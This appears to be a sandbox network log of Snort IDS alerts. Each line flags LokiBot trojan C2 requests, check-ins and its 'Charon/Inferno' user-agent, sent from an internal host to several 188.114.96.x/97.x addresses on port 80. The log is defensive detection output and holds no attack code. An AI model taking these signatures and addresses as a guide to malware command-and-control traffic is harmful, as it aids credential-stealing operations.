Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49216 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49216 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49217 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49217 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49217 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49217 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49217 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49218 -> 188.114.97.9:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49218 -> 188.114.97.9:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49218 -> 188.114.97.9:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49218 -> 188.114.97.9:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49218 -> 188.114.97.9:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49219 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49219 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49219 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49219 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49219 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49220 -> 188.114.97.9:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49220 -> 188.114.97.9:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49220 -> 188.114.97.9:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49220 -> 188.114.97.9:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49220 -> 188.114.97.9:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49221 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49221 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49221 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49221 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49221 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49222 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49222 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49222 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49222 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49222 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49223 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49223 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49223 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49223 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49223 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49224 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49224 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49224 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49224 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49224 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49225 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49225 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49225 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49225 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49225 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49226 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49226 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49226 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49226 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49226 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49227 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49227 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49227 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49227 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49227 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49228 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49228 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49228 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49228 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49228 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49229 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49229 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49229 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49229 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49229 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49230 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49230 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49230 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49230 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49230 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49231 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49231 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49231 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49231 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49231 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49232 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49232 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49232 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49232 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49232 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49233 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49233 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49233 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49233 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49233 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49234 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49234 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49234 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49234 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49234 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49235 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49235 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49235 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49235 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49235 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49236 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49236 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49236 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49236 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49236 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49237 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49237 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49237 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49237 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49237 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49238 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49238 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49238 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49238 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49238 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49239 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49239 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49239 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49239 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49239 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49240 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49240 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49240 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49240 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49240 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49241 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49241 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49241 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49241 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49241 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49242 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49242 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49242 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49242 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49242 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49243 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49243 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49243 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49243 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49243 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49244 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49244 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49244 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49244 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49244 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49245 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49245 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49245 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49245 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49245 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49246 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49246 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49246 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49246 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49246 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49247 -> 188.114.97.9:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49247 -> 188.114.97.9:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49247 -> 188.114.97.9:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49247 -> 188.114.97.9:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49247 -> 188.114.97.9:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49248 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49248 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49248 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49248 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49248 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49249 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49249 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49249 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49249 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49249 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49250 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49250 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49250 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49250 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49250 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49251 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49251 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49251 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49251 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49251 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49252 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49252 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49252 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49252 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49252 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49253 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49253 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49253 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49253 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49253 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49254 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49254 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49254 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49254 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49254 -> 188.114.96.9:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49255 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49255 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49255 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49255 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49255 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49256 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49256 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49256 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49256 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49256 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49257 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49257 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49257 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49257 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49257 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49258 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49258 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49258 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49258 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49258 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49259 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49259 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49259 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49259 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.22:49259 -> 188.114.97.3:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49260 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49260 -> 188.114.96.3:80
